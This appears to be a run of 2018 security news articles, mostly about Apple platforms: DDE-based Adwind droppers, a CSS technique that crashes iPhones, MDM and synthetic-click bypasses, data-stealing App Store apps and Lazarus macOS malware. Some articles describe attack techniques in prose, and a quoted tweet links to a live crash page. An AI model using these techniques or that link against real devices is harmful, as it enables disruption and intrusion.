The campaign was uncovered at the end of August, attackers mainly targeted users in Turkey (75%), experts noticed that other victims were located in Germany, but likely members of the Turkish community.

The spam campaign uncovered by the experts leveraged on malicious documents that were written in Turkish.

“This new campaign, first discovered by ReversingLabs on Sept. 10, appears to be a variant of the Dynamic Data Exchange (DDE) code injection attack on Microsoft Excel that has appeared in the wild in the past. This time, the variant is able to avoid detection by malware-blocking software. ReversingLabs has written their own blog on this issue here.” reads the analysis published by Cisco Talos.

The experts observed at least two different droppers in this campaign that use both the .csv or .xlt files that are opened by default by Microsoft Excel.

Both of them would leverage a new variant of the DDE code injection attack, although this technique is well-known, the variant used in this campaign is still undetected.

The dropper file can have more than 30 different file extensions some of them are not opened by Excel by default, however, the attackers can use a script launching Excel with a file with one of these extensions as a parameter.

“Formats like CSV doesn’t have a predefined header, thus it can contain any kind of data at the beginning. Having random data like in the samples we found my trick the anti-virus into skip the file scanning. Other formats may be considered corrupted, as they might not follow the expected format.” continues the report.

Adwind campaign

Excel will display differed warnings to the user regarding the execution of code, the first related to the execution of a corrupted file, the second one notifies the user that the document will execute the application “CMD.exe.”

If the user accepts all the warnings, the application is executed on the system.

Talos pointed out that attackers aim at injecting code that would create and execute a Visual Basic Script that uses the bitasdmin Microsoft tool to download or upload jobs and monitor their progress, to get the final payload in the form of a Java archive.

The Java code is packed with the demo version of the “Allatori Obfuscator commercial packer, version 4.7.

The final payload is a sample the Adwind RAT v3.0.

“The DDE variant used by the droppers in this campaign is a good example on how signature based antivirus can be tricked. It is also a warning sign regarding the file extension scanning configurations.” Talos concludes.

“This kind of injection is known for years, however this actor found a way to modify it in order to have an extremely low detection ratio,”

Further details, including IoCs, are reported in the analysis published by Talos.

Experts disclose a Webroot SecureAnywhere macOS Kernel Level bug found months ago
17.9.2018 securityaffairs

Security experts disclosed a locally exploitable kernel-level vulnerability in the Webroot SecureAnywhere macOS security software.
The Webroot SecureAnywhere macOS security software was affected by a locally exploitable kernel-level vulnerability. An attacker that exploit the flaw could execute malware at the “kernel level” on a vulnerable Mac system.

The vulnerability, tracked as CVE-2018-16962, was patched months ago but publicly disclosed only yesterday.

“Webroot SecureAnywhere before on macOS mishandles access to the driver by a process that lacks root privileges.” reads the security advisory.

The flaw is difficult to trigger, it is exploitable only by a local attacker that is logged into a vulnerable Mac system or by tricking an already logged-in user into opening an exploit through social engineering.

The vulnerability was discovered by researchers at Trustwave, the flaw was caused by the lack of validation of arbitrary user-supplied pointer being read from and potentially written too.

“Email Trustwave recently discovered a locally exploitable issue in the macOS version of the Webroot SecureAnywhere solution.” reads the analysis published by Trustwave.

“The issues root cause is an arbitrary user-supplied pointer being read from and potentially written too. As such, the issue arms an attacker with a write-what-where kernel gadget with the caveat that the original value of the memory referenced by the pointer must be equal to (int) -1.”

Under certain conditions, the issue could be chained with other exploit to gain a local privilege escalation.

The researchers pointed out that the exploitability of the flaw is limited in that the original value of the memory address dereferenced must be (int) -1.

A workable exploit could be implemented bypassing the KASLR (kernel address space layout randomisation) on the versions of OSX/macOS supported by SecureAnywhere.

Webroot addressed the vulnerability since July with the release of SecureAnywhere for MacOS version At the time of writing, there is no evidence of any compromises from this vulnerability.

Trustwave decided to disclose only now the issue for the following reason;

“It is important that the details of our research are accurate and in order. Vendors at times issue a patch faster than we post full details on findings. We often provide users with more time to apply the patch before we release technical details about a vulnerability.”

SecureAnywhere webroot

Below the statement published by Webroot:

“The security of our customers is of paramount importance to Webroot. This vulnerability was remedied in software version which has been available for our customers since July 24, 2018. We have no evidence of any compromises from this vulnerability.

For any user running a version of Mac not currently supported by Apple (OS 10.8 or lower), we recommend upgrading to an Apple-supported version to receive our updated agent and be in line with cybersecurity best practices on system patching.

Collaboration in the cybersecurity community is what keeps us all safer. We appreciate the Trustwave SpiderLabs team’s use of responsible disclosure to help protect the wider community from cyberthreats.”

Researcher devised a new CSS & HTML attack that causes iPhone reboot or freezes Macs
17.9.2018 securityaffairs

The security researcher security researcher Sabri Haddouche from Wire devised a new CSS attack that causes iPhone reboot or freezes Macs.
The security researcher security researcher Sabri Haddouche from Wire devised a new attack method that saturates Apple device’s resources and causing it crashes or system restarts when visiting a web page. The experts discovered that iOS restart and macOS freezes when the user visits a web page that contains certain CSS & HTML.

Depending on the version of iOS being used, the bug could trigger the UI restart, cause a kernel panic and consequent device reboot.

How to force restart any iOS device with just CSS? 💣

Source: https://gist.github.com/pwnsdx/ce64de2760996a6c432f06d612e33aea …

IF YOU WANT TO TRY (DON’T BLAME ME IF YOU CLICK) : https://cdn.rawgit.com/pwnsdx/ce64de2760996a6c432f06d612e33aea/raw/23f2faa0aadb4babbfd228c8bb32a26a8c51c741/safari-ripper.html …

2:45 PM - Sep 15, 2018

Safari Ripper ☠️
Safari Ripper ☠️. GitHub Gist: instantly share code, notes, and snippets.

1,389 people are talking about this
Twitter Ads info and privacy
This attack leverages a weakness in the -webkit-backdrop-filter CSS, for this reason, it affects all browsers on iOS that leverage on WebKit as rendering engine is WebKit. The weakness also affects Safari and Mail in macOS, but it doesn’t affect Linux and Windows systems.

“The attack exploits a weakness in the –webkit-backdrop-filter CSS property,” Haddouche explained to BleepingComputer. “By using nested divs with that property, we can quickly consume all graphic resources and crash or freeze the OS. The attack does not require Javascript to be enabled therefore it also works in Mail. On macOS, the UI freeze. On iOS, the device restart.”


Haddouche successfully tested the attack on iOS 12 and caused the device to reboot, on iOS 11.4.1 it only caused a UI restart.

Haddouche explained that on macOS, the attack will only cause Mail and Safari to freeze for a second and then slow down the computer.

Haddouche also devised another attack that uses HTML, CSS, and JavaScript to completely freeze macOS systems. The researchers told Bleeping Computer that he has not disclosed it because it persists after reboot and macOS will relaunch Safari with the malicious page, causing the system entering in a look that freeze it again.

Lawrence Abrams from Bleeping Computer created a video showing what happens when a user visits the attack page created by Haddouche (sees the rawgit[.]com) and published on Github. Lawrence used an iPhone running iOS 11.4.1.

The bad news is that there is no mitigation for this attack.

How Apple's Safari Browser Will Try to Thwart Data Tracking
15.9.2018 securityweek Apple

New privacy features in Apple's Safari browser seek to make it tougher for companies such as Facebook to track you.

Companies have long used cookies to remember your past visits. This can be helpful for saving sign-in details and preferences. But now they're also being used to profile you in order to fine-tune advertising to your tastes and interests.

Cookie use goes beyond visiting a particular website. As other sites embed Facebook "like" and "share" buttons, for instance, Facebook's servers are being pinged and can access your stored cookies. That means Facebook now knows you frequent celebrity gossip sites or read news with a certain political bent. Ads can be tailored to that.

Here's how Safari is getting tougher in dealing with that.


Safari used to wait 24 hours from your last visit to a service before blocking that service's cookies on third-party sites. That effectively exempted Facebook, Google and other services that people visited daily. Now, Safari will either block the cookie automatically or prompt you for permission.

Apple says Safari will still be able to remember sign-in details and other preferences, though some websites have had to adjust their coding.


Browsers typically reveal seemingly innocuous information about your device, such as the operating system used and fonts installed. Websites use this to make minor adjustments in formatting so that pages display properly.

Browsers have historically made a lot of information available, largely because it seemed harmless. Now it's clear that all this data, taken together, can be used to uniquely identify you. Safari will now hide many of those specifics so that you will look no different from the rest.

It's like a system that digitally blurs someone's image, said Lance Cottrell, creator of the privacy service Anonymizer. "You can tell it's a person and not a dog, but you can't recognize a person's face," he said.

For instance, Safari will reveal only the fonts that ship with the machine, not any custom fonts installed.


When visiting a website, the browser usually sends the web address for the page you were just on. This address can be quite detailed and reveal the specific product you were exploring at an e-commerce site, for instance.

Now, Safari will just pass on the main domain name for that site. So it would be just "Amazon.com" rather than the specific product page at Amazon.


Some ad companies have sought to bypass restrictions on third-party cookies — that is, identifiers left by advertisers — by using a trick that routed them through a series of websites. That could make a third-party cookie look like it belonged to a site you're visiting. Safari will now try to catch that.

The changes come Tuesday as part of the iOS 12 update for iPhones and iPads and a week later in the Mojave update for Mac computers.

Many of the safeguards will be limited to cookies that Apple deems to be trackers. That's being done to reduce the likelihood of inadvertently blocking legitimate third-party cookies.

Mac Apps From Apple's App Store Steal User Data, Researchers Say
10.9.2018 securityweek Apple

Mac applications distributed via Apple’s official App Store marketplace are collecting and exfiltrating sensitive user data, security researchers have discovered.

The multiple programs exhibiting such behavior send the collected data to the developer’s infrastructure, but some of the data ends up on Chinese servers, “which may not be subject to the same stringent requirements around storage and protection of personally identifiable information like organizations based in the US or EU,” Malwarebytes says.

One of the offending applications is Adware Doctor, which Objective-See’s Patrick Wardle found exfiltrating browser history (targeting Safari, Chrome, and Firefox), a list of all running processes, and a list of software that the user has downloaded (and from where).

To gain access to the list of running processes, the developer found a way to bypass Apple’s sandbox protections. By posing as a security-related app, the software can request file-access permissions that otherwise would not be granted to it.

Despite its malicious purpose, Adware Doctor managed to become highly popular, being the fourth top paid software in the official Mac App Store, and first in the paid utilities section. Apple has removed the software from the store, but it might not be long before it returns.

This has happened in the past. The app first emerged in the Mac App Store a couple of years ago, named Adware Medic, a rip off of Thomas Reed’s highly-successful app with the same name, which became Malwarebytes for Mac. Apple pulled it after being informed on the matter, but within weeks the app returned as Adware Doctor.

“We’ve continued to fight against this app, as well as others made by the same developer, and it has been taken down several times now, but in a continued failure of Apple’s review process, is always replaced by a new version before long,” Malwarebytes’ Thomas Reed explains.

Open Any Files: RAR Support is yet another app that shows a similar behavior, collecting user data in a .zip archive and uploading the file to a developer’s server. Exfiltrated data included complete browsing and search history for Safari, Chrome, and Firefox, and complete App Store browsing history. Recently, the software stopped siphoning said data.

The app was also designed to promote Dr. Antivirus, usually when the user opens an unfamiliar file (often claiming that an infection is preventing the user from opening the file). Reed says Open Any Files dropped on their radar last year and was reported to Apple in December 2017.

Dr. Antivirus, in addition to lacking good detection rates, was also observed exhibiting “the same pattern of data exfiltration as seen in Open Any Files! We saw the same data being collected and also uploaded in a file named file.zip to the same URL used by Open Any Files,” Reed notes.

In addition to browsing history, the file was found to contain detailed information about every application found on the system.

As it turns out, other applications from the same developer have data exfiltration capabilities, including Dr. Cleaner (which doesn’t collect the list of installed applications). The website that promotes these apps appears to be owned by an individual living in China.

The main issue, Reed says, is that Apple allows for such apps to be listed in the official store and that it is sometimes slow to take action on the offending applications, despite researchers’ reports. Thus, users should pay attention when downloading software from the Mac App Store, as some applications could be dangerous.

“It’s blindingly obvious at this point that the Mac App Store is not the safe haven of reputable software that Apple wants it to be. I’ve been saying this for several years now, as we’ve been detecting junk software in the App Store for almost as long as I’ve been at Malwarebytes. This is not new information, but these issues reveal a depth to the problem that most people are unaware of,” Reed points out.

A growing number of iOS apps collect and sell location data
10.9.2018 securityaffairs Apple

A growing number of iOS apps currently collect location data, WiFi network IDs and other data, from iPhone users and sell them to monetization firms.
A group of security researchers that developed the popular Guardian mobile firewall app revealed that a growing number of iOS apps currently collect location data, WiFi network IDs and other data, from iPhone users and sell them to advertising companies.

Let me immediately highlight that these iOS apps collect data by asking users for permission to do it, but lack to inform users that gathered information are shared with third-party advertising and marketing companies.

The experts have observed that all these apps have embedded tracking codes provided by advertising and marketing firms.

“The GuardianApp team has discovered that a growing number of iOS apps have been used to covertly collect precise location histories from tens of millions of mobile devices, using packaged code provided by data monetization firms. In many cases, the packaged tracking code may run at all times, constantly sending user GPS coordinates and other information.” states the Guardian app research team.

“In order to gain initial access to precise data from the mobile device’s GPS sensors, the apps usually present a plausible justification relevant to the app in the Location Services permission dialog, often with little or no mention of the fact that location data will be shared with third-party entities for purposes unrelated to app operation.”
ios apps
Most of the apps asked for permission to access GPS coordinates, Bluetooth LE beacon data, and Wi-Fi SSID (Network Name) and BSSID (Network MAC Address).

Some apps also collect other types of device information, including accelerometer Information (X-axis, Y-axis, Z-axis), advertising Identifier (IDFA), battery Charge Percentage and Status (Battery or USB Charger), cellular Network MCC/MNC, cellular Network Name, GPS Altitude and/or Speed, timestamps for departure/arrival to a location.

The report published by the Guardian app team includes the names of 12 monetization firms that received data along with the names of 24 apps that use the tracking code provided by location data monetization firms.

The report also includes the names of 100 news apps containing monetization code provided by data monetization firm RevealMobile.

“In August 2017, RevealMobile was also found to be packaged in the AccuWeather app for a brief period of time and was criticized by users for collecting Wi-Fi SSID and BSSID from user’s even if Location Services access was denied (More:https://www.zdnet.com/article/accuweather-caught-sending-geo-location-data-even-when-denied-access/ ).” continues the report.

Experts also shared these potential mitigations:

Go to Settings > Privacy > Advertising and turn on Limit Ad Tracking in order to make uniquely identification of your iOS device more difficult for location trackers.
Press “Don’t Allow” if a Location Services permission dialog contains “See privacy policy” or similar text.
Use a very generic name for the SSID of your home Wi-Fi router (eg. “home-wifi-1”).
Turn off Bluetooth functionality when it is not in use.

Apple removed the popular app Adware Doctor because steals user browsing history
8.9.2018 securityaffairs Apple

Apple has removed one of the most popular anti-malware app called Adware Doctor:Anti Malware &Ad from the official macOS App Store
Apple has removed one of the most popular anti-malware app called Adware Doctor:Anti Malware &Ad from the official macOS App Store because it was gathering users’ browser histories and other sensitive data and then upload them to a remote server in China.

Adware Doctor the top paid utility in the official Mac App Store, it has a good reputation with thousands of reviews and a 4.8 star rating.

Ironically an application developed to protect Mac systems was exposing user personal data without his permission.

The unwanted behavior was spotted by a security researcher that goes online with Twitter account Privacy 1st, he discovered that Adware Doctor would gather browsing history from the Safari, Chrome, and the Firefox browsers, the search history on the App Store, and a list of running processes.

YouTube ‎@YouTube

Privacy 1st
Top Sold MacOS AppStore application is ROGUE. Adware Doctor is stealing your privacy. PoC: https://www.youtube.com/watch?v=nZ7CVIy5Tq8&feature=youtu.be …#malware #virus #MacOS #Apple #MacBook #MacBookPro #CyberSecurity #privacy #GDPR #Hacking #hackers #cyberpunk #Alert

8:30 AM - Aug 20, 2018
43 people are talking about this
Twitter Ads info and privacy
The expert discovered also that the gathered info was first stored in a password protected zip file named “history.zip”, then it would be uploaded to a remote server.

Privacy 1st shared his discovery with the former NSA white hat hacker Patrick Wardle that after conducting a personal review confirmed the findings of the researcher.

Below a video created by Privacy_1st to show his findings.

Patrick Wardle by redirecting DNS resolution was able to capture the exfiltrated data:

adware doctor

The history.zip file is exfiltrated to a remote to dscan.yelabapp.com that is hosted on Amazon AWS servers, but the analysis of the DNS entries confirms that it is administered by an entity in China.

The app was developed by an individual identified as “Yongming Zhang.” Wardle speculated that this may be a reference to “Zhang Yongming,” a Chinese serial killer.

Thomas Reed, director of Mac and mobile security at Malwarebytes, his firm is monitoring the activity of this developer since 2015.

“At that time, we discovered an app on the App Store named Adware Medic – a direct rip-off of my own highly-successful app of the same name, which became Malwarebytes for Mac,” Reed wrote.

“We immediately began detecting this, and contacted Apple about removing the app. It was eventually removed, but was replaced soon after by an identical app named Adware Doctor.”

Reed confirmed that similar data exfiltration methodology was observed in other products as well (i.e. “Open Any Files: RAR Support”, “Dr. Antivirus”, and ‘Dr. Cleaner”).

Unfortunately, Apple is allowing such kind of dubious behavior and is allowing similar app names that could generate confusion in the users.

“If Apple is really “review[ing] each app before it’s accepted by the store” … how were these grave (and obvious) violations of this application missed!?,” Wardle states in his blog post. “Who knows, and maybe this one just slipped though. Maybe we should give them the benefit of the doubt, as yes we all make mistakes!But this bring us to the next point. Apple also claims that “if there’s ever a problem with an app, Apple can quickly remove it from the store”. Maybe the key word here is “can”.”

Attackers Abuse Age Restrictions to Hide Apps on iOS Devices
6.9.2018 securityweek Apple

Malicious actors leveraging an open source mobile device management (MDM) system have been abusing a legitimate iOS feature to hide legitimate applications and trick victims into using malicious counterparts.

The attacks, first exposed by Talos’ security researchers in July, involved the use of malicious versions of five programs (AppsSLoader, Telegram, WhatsApp, PrayTime, and MyApp) that were then deployed onto iOS devices to steal messages.

Given how the enrollment process for the MDM works, the security researchers assumed right from the start that the rogue applications were being installed either via direct access to the compromised devices or through sophisticated social engineering. Each step of the enrollment process required user interaction, Talos discovered.

The security researchers now reveal that the attackers abused the MDM solution to control the victims’ devices and deploy a new profile onto them. Next, the actors leveraged the age rating restriction functionality in iOS to hide the legitimate apps.

The age ratings for WhatsApp and Telegram are 12-plus and 17-plus, respectively, and the actors set the age rating limit to 9-plus. Thus, the legitimate apps would no longer be shown on the device and the victim was only able to access the rogue variants instead.

“The app still exists on the device, however, the user will not be able to interact with it, even if the user searches for the app using the search function on the iOS device. It simply does not open. All mobile device users should be aware of these attack methods as to prevent attackers from gaining control of their phones through an MDM,” Talos explains.

iOS supports the configuring of devices using profiles, and the MDM enrollment mechanism too is performed using a profile. Such profiles are easy to create and Apple even offers an official tool for that. These apps allow for the restriction of app usage, but the app restriction is usually limited to the supervised device.

The iPhones impacted by these attacks, however, were not in supervised mode. Instead, the attackers abused the age rating to forbid the usage of apps rated for ages 9 and above. Thus, the apps remained on the device but could no longer be accessed.

“Once this profile is installed on the iOS device, the applications restricted by the age rating stay installed, but can no longer be used or accessed, and the icon disappears from the device springboard,” Talos explains.

The profile can be installed manually via Apple Configurator, or by opening the profile XML from Safari. Once that happens, a new entry appears in the Settings > General > Profile menu. However, if the MDM deploys the profile, it does not appear there (the MDM enrollment profile will be present).

“It's important to note here that there is no malicious malware, vulnerability or zero-day used to enroll the phone within the MDM. It is a legitimate method of device administration that is used within enterprises throughout the world. The attacker has merely leveraged this process,” the researchers note.

Users can head to Settings > General > Profiles & Device Management > [MDM configuration] on their iOS devices to view information about the restrictions and applications set/installed by MDM profiles. If no Profiles & Device Management menu is available, the device is not enrolled.

North Korean Hackers Hit Cryptocurrency Exchange with macOS Malware
24.8.2018 securityweek Apple

In a recent attack against a cryptocurrency exchange, the North Korea-linked Lazarus group went the extra mile by deploying malware for macOS, Kaspersky Lab has discovered.

Active since at least 2009 and supposedly backed by the North Korean government, Lazarus is considered the most serious threat to banks. The group is said to have orchestrated a large number of high profile attacks, including the Sony hack in 2014 and last year’s WannaCry outbreak.

In the recent months, in addition to banks, the group focused on various cryptocurrency exchanges. In one of the attacks, which Kaspersky refers to as Operation AppleJeus, the group tricked an unsuspecting employee to download a trojanized cryptocurrency trading application that covertly downloaded and installed the Fallchill malware.

What made this attack stand out compared to other Lazarus-linked incidents, however, was the fact that the attackers designed their malware to target macOS too, in addition to Windows. This is the first time Lazarus is observed using malware for Apple’s operating system, Kaspersky says.

“The fact that the Lazarus group has expanded its list of targeted operating systems should be a wake-up call for users of non-Windows platforms,” the security firm points out.

The malicious code, however, wasn’t delivered alongside the application’s installation package. Instead, it was pushed to the target machine in the form of an update, Kaspersky’s security researchers have discovered.

The legitimate-looking application is called Celas Trade Pro and comes from Celas Limited. An all-in-one style cryptocurrency trading program, it showed no signs of malicious behavior at first.

However, at the end of the installation process, it was seen running the Updater.exe module, which would collect system information and send it back to the server in the form of a GIF image.

Based on the server’s response, the updater either keeps quiet or extracts a payload with base64 and decrypts it using RC4 with another hardcoded key to retrieve an executable file.

“For macOS users, Celas LLC also provided a native version of its trading app. A hidden ‘autoupdater’ module is installed in the background to start immediately after installation, and after each system reboot,” Kaspersky explains.

The module would continuously contact the command and control (C&C) server to fetch and run an additional executable file. The communication with the server is performed in a manner similar to that employed by the Windows version, with the system information being sent encrypted, disguised as an image file upload and download.

The Updater application is unlisted in the Finder app or default Terminal directory listing and is passed the command-line argument “CheckUpdate” at launch. Apparently, the application quits if no argument is fed, likely a way to trick detection by sandboxes.

The updater works the same as the Windows variant, both being implemented using the cross-platform Qt framework. At execution, it creates a unique identifier for the infected host, collects basic system information, then encrypts the data and transfers it to the attacker’s server.

The dropped executable file has an unusually large size, likely because it was inflated with junk data. The main purpose of the malware is to implant the Fallchill backdoor loader onto the compromised machine.

The Fallchill backdoor is a piece of malware formerly attributed to the Lazarus group that contains “enough functions to fully control the infected host,” Kaspersky points out. The malware operators appear to be reusing code and C&C infrastructure over and over again, the security firm also notes.

“Lazarus group has entered a new platform: macOS. […] We believe that in the future Lazarus is going to support all platforms that software developers are using as a base platform, because compromising developers opens many doors at once,” Kaspersky says.

What is yet unclear, however, is whether Lazarus was able to compromise Celas and abuse its update mechanism to deliver malware, or if the hackers managed to create “a legitimate looking business and inject a malicious payload into a ‘legitimate looking’ software update mechanism,” thus creating a fake supply chain.

'Hacky Hack Hack': Australia Teen Breaches Apple's Secure Network
17.8.2018 securityweek Apple

A schoolboy who "dreamed" of working for Apple hacked the firm's computer systems, Australian media has reported, although the tech giant said Friday no customer data was compromised.

The Children's Court of Victoria was told the teenager broke into Apple's mainframe -- a large, powerful data processing system -- from his home in the suburbs of Melbourne and downloaded 90GB of secure files, The Age reported late Thursday.

The boy, then aged 16, accessed the system multiple times over a year as he was a fan of Apple and had "dreamed of" working for the US firm, the newspaper said, citing his lawyer.

Apple said in a statement Friday that its teams "discovered the unauthorised access, contained it, and reported the incident to law enforcement".

The firm, which earlier this month became the first private-sector company to surpass US$1 trillion in market value, said it wanted "to assure our customers that at no point during this incident was their personal data compromised".

An international investigation was launched after the discovery involving the FBI and the Australian Federal Police, The Age reported.

The federal police said it could not comment on the case as it is still before the court.

The Age said police raided the boy's home last year and found hacking files and instructions saved in a folder called "hacky hack hack".

"Two Apple laptops were seized and the serial numbers matched the serial numbers of the devices which accessed the internal systems," a prosecutor was reported as saying.

A mobile phone and hard drive were also seized whose IP address matched those detected in the breaches, he added.

The teen has pleaded guilty and the case is due to return to court for his sentencing next month.

An Australian schoolboy hacked into Apple Servers and stole 90GB of secure files
17.8.2018 securityaffairs Apple

According to Australian media, a teen hacker broke into Apple mainframe and downloaded 90GB of secure files. He dreams to work for the Tech Giant.
I believe it is time for Apple to hire an Australian 16-year old schoolboy who hacked its computer systems. Yes, it is not a joke, according to Australian media the teen hacker broke into Apple mainframe and downloaded 90GB of secure files.

It is embarrassing, the young hacker targeted Apple system from his home in Melbourne.

Downloaded data included extremely secure authorized keys used to grant login access to users, as well as access multiple user accounts, Apple declared that no customer data was exposed.

When the authorities identified the young hacker, he explained that he attempted to hack Apple because he is a fan of the company and “dreamed of” working for it.

According to the Children’s Court of Victoria, the schoolboy hacked the company’s servers numerous times in more than a year, only when Apple finally discovered the intrusion, the company contacted the FBI.

Feds with the help of the Australian Federal Police (AFP) blocking the hacker and identified him.

The Apple security team “discovered the unauthorised access, contained it, and reported the incident to law enforcement”.

[We wanted] “to assure our customers that at no point during this incident was their personal data compromised” added Apple.

Apple hacked

The police raided the home of the schoolboy last year and found evidence of the hack, the agents found hacking files and instructions saved in a folder called “hacky hack hack”. The police also seized a mobile phone and hard drive.

“Two Apple laptops were seized, and the serial numbers matched the serial numbers of the devices which accessed the internal systems,” a prosecutor was quoted as saying by Australian media The Age. “A mobile phone and hard drive were also seized, and the IP address matched the intrusions into the organization.”

The tech giant requested authorities of not disclosing details regarding the way the hacker breached its systems.

The teen has pleaded guilty to a Children’s Court, the judge has postponed his sentencing till next month (20 September).

Apple zero-day exposes macOS to Synthetic Mouse-Click attacks
13.8.2018 securityaffairs Apple

Patrick Wardle, the popular white hat hacker, has discovered a zero-day vulnerability that could allow attackers to carry out synthetic mouse-click attacks
Patrick Wardle, the popular white hat hacker and chief research officer at Digita Security, has discovered a zero-day vulnerability that could allow attackers to mimic mouse-clicks for kernel access.

Wardle presented his discovery during the Def Con 2018 conference in Las Vegas, he explained that by using two lines of code he found an Apple zero-day in the High Sierra operating system that could allow a local attacker to virtually “click” a security prompt and thus load a kernel extension.

Once obtained the Kernel access on a Mac, the attack can fully compromise the system.

Apple has already in place security measures to prevent attackers from mimicking mouse-clicks for approving security prompts presented to the user when attempting to perform tasks that can potentially expose to risks the system.

Patrick Wardle has discovered a flaw that allows attackers to bypass such kind of security measures through Synthetic Mouse-Click attacks.

patrick wardle

Good morning @Defcon attendees ☀️

My talk, "🐭 > ⚔️" is today:
"The Mouse is Mightier than the Sword"
Sunday 10:00, 101 Track, Flamingo

Includes new bypasses of privacy controls & 0day breaking 'User Assisted Kext Loading' 🙈🍎🤒

See you there 🤗 https://www.defcon.org/html/defcon-26/dc-26-speakers.html#Wardle2 …

5:29 PM - Aug 12, 2018
18 people are talking about this
Twitter Ads info and privacy
Wardle recently demonstrated that a local, privileged attacker could leverage vulnerabilities in third-party kernel extensions to bypass Apple’s kernel code-signing requirements.

Malware developers and hackers have started using synthetic mouse-click attacks to bypass this security mechanism and emulate human behavior in approving security warnings.

Apple mitigated the attack devised by Wardle by implementing a new security feature dubbed “User Assisted Kernel Extension Loading,” a measure that force users to manually approve the loading of any kernel extension by clicking the “allow” button in the security settings UI.

The latest macOS versions, including High Sierra introduced a filtering mechanism to ignore synthetic events.

“Before an attacker can load a (signed) kernel extension, the user has to click an ‘allow’ button. This recent security mechanism is designed to prevent rogue attacks from loading code into the kernel. If this mechanism is bypassed it’s game over,” Wardle explained.

Synthetic Mouse-Click attacks

Wardle discovered that is it possible to deceive macOS by using two consecutive synthetic mouse “down” events because the operating system wrongly interprets them as a manual approval.

“For some unknown reason the two synthetic mouse ‘down’ events confuse the system and the OS sees it as a legitimate click,” Wardle said. “This fully breaks a foundational security mechanism of High Sierra.”

The expert explained that the operating system confuses a sequence of two-down as mouse “down” and “up.” The OS also confuse the “up” event as an internal event and for this reason, it is not filtered and it can be abused to interact with High Sierra’s user interface allowing to load kernel extensions.

Wardle accident discovered the issue by copying and pasting code for a synthetic mouse down twice.

“I was just kind of goofing around with this feature. I copied and pasted the code for a synthetic mouse down twice accidentally – forgetting to change a value of a flag that would indicate a mouse “up” event. Without realizing my ‘mistake,’ I compiled and ran the code, and honestly was rather surprised when it generated an allowed synthetic click!”

“Two lines of code completely break this security mechanism,” he added. “It is truly mind-boggling that such a trivial attack is successful. I’m almost embarrassed to talk about the bug as it’s so simple — though I’m actually more embarrassed for Apple.”

According to Wardle, the issue only affects High Sierra, because it is the using OS version that implements the Apple’s User Assisted Kernel Extension Loading.

The Wardle’s presentation is available at the following URL:


Experts explained how to hack macs in enterprises through MDM
11.8.2018 securityaffairs Apple

Researchers demonstrated how a sophisticated threat actor can hack a brand new Apple Mac computer in enterprise environments through MDM.
A security duo composed by Jesse Endahl, CPO and CSO at macOS management firm Fleetsmith, and Max Bélanger, staff engineer at Dropbox, demonstrated at the Black Hat security conference how a persistent attacker could compromise brand new Mac systems in enterprise environments on the first boot.

The experts leverage the Apple mobile device management protocol to retrieve the manifest and install a different application than the one chosen by the victim.

MDM allows administrators in enterprises to remotely manage macOS and iOS devices, it allows to easily install or remove applications, lock devices or securely erase them.

Every time a new device is added in an enterprise, it receives a Configuration Profile, an operation that can be performed automatically using the Device Enrollment Program (DEP).

macOS computers automatically contact the MDM server during the boot or after a factory reset procedure.

The DEP profile sent to the device is created by the MDM server and includes information related to software installation (i.e. server’s URL, pinned certificates).

MDM Apple hack

By using the MDM command InstallApplication, administrators can install a specified application. The command uses a manifest URL that returns an XML file containing all the information needed to install the application.

The experts explained that it is possible to manipulate this manifest to install a specific application by carrying out a man-in-the-middle (MitM) attack.

The attack is not easy to conduct, anyway, a sophisticated nation-state actor or an ISP could carry out it.

The attack can exploit this technique to force the installation of a malicious application as soon as the macOS computers connect to the MDM server.

The security duo reported the hacking technique to Apple in April and early May Apple acknowledged it. Apple addressed the issue in July with the release of macOS version 10.13.6.

“We disclosed the issue to Apple shortly after discovering it. Based on our feedback, a fix was quickly implemented in the form of a new MDM command: InstallEnterpriseApplication, which is now documented publicly” reads the research paper published by the experts.

“This command (available as of macOS 10.13.6) allows MDM vendors to provide specific certificates to pin the request to the ManifestURL (using the new ManifestURLPinningCerts property of said command). It is up to the MDM vendor to implement this, but this serves as an adequate solution to this problem. We will take a closer look at how the vulnerability was addressed.”

With the new release, Apple introduced the InstallEnterpriseApplication MDM that allows MDM vendors to provide certificates to pin the request to the manifest URL.

Macs in Enterprise Can Be Hacked on First Boot
10.8.2018 securityweek Apple

Hacking Macs in the enterprise via MDM

Researchers have demonstrated that brand new Mac computers used in enterprise environments can be hacked by sophisticated threat actors on the first boot through Apple’s mobile device management (MDM) protocol.

MDM is designed to allow system administrators to send management commands to managed macOS and iOS devices, including to install or remove applications, monitor compliance with corporate policies, and securely erase or lock a device.

When a device is enrolled in MDM, it receives a Configuration Profile, which can either be installed manually or ​automatically using the Device Enrollment Program (DEP). If DEP is used on macOS, the device automatically checks in with the MDM server during the initial setup process or after the system has been reset to factory settings and the operating system has been reinstalled.

The DEP profile received by a device during this process is delivered by Apple but populated by the MDM server. The profile includes information such as the MDM server’s URL, pinned certificates, and which screens should be skipped during the setup process.

One of the most popular MDM commands used during the initial setup process is InstallApplication, which allows administrators to install a specified application package. The command relies on a manifest URL that returns an XML file containing all the information needed to install the app.

Jesse Endahl, CPO and CSO at macOS management firm Fleetsmith, and Max Bélanger, staff engineer at Dropbox, showed this week at the Black Hat security conference how a threat actor could compromise the retrieval of the manifest and install a different application than the one intended by the victim.

Exploitation involves a man-in-the-middle (MitM) attack, which makes it difficult for unsophisticated cybercrime groups. However, a sophisticated state-sponsored actor or a malicious ISP may be able to carry out such an attack and infiltrate devices in a targeted organization.

According to Bélanger and Endahl, an attacker could use this method to take full control of Mac computers right after they are unboxed, as soon as they connect to the organization’s Wi-Fi network.

The researchers disclosed their findings to Apple in late April and the tech giant acknowledged their findings on May 2. The company implemented a fix on July 9 with the release of macOS 10.13.6.

Apple addressed the issue by implementing a new MDM command named InstallEnterpriseApplication​. This command allows MDM vendors to provide specific certificates to pin the request to the manifest URL.

“It is up to the MDM vendor to implement this, but this serves as an adequate solution to this problem,” the researchers wrote in a paper.

Snapchat Source Code Leaked
8.8.2018 securityweek  Apple

iOS Update Led to Snapchat Source Code Leak

Hackers obtained some source code for the popular messaging application Snapchat and made it public on GitHub, claiming that they were ignored by the app’s developer.

The source code appears to be for the frontend of Snapchat for iOS. The company behind Snapchat, Snap Inc., has confirmed that the code is genuine by getting GitHub to remove it using a DMCA (Digital Millennium Copyright Act) request.

When users file a DMCA request with GitHub, they are instructed to provide a detailed description of the original copyrighted work that has allegedly been infringed. In this section, a Snap representative wrote, “Snapchat source code. It was leaked and a user has put it in this GitHub repo. There is no URL to point to because Snap Inc. doesn't publish it publicly.”

Snapchat code leaked to GitHub

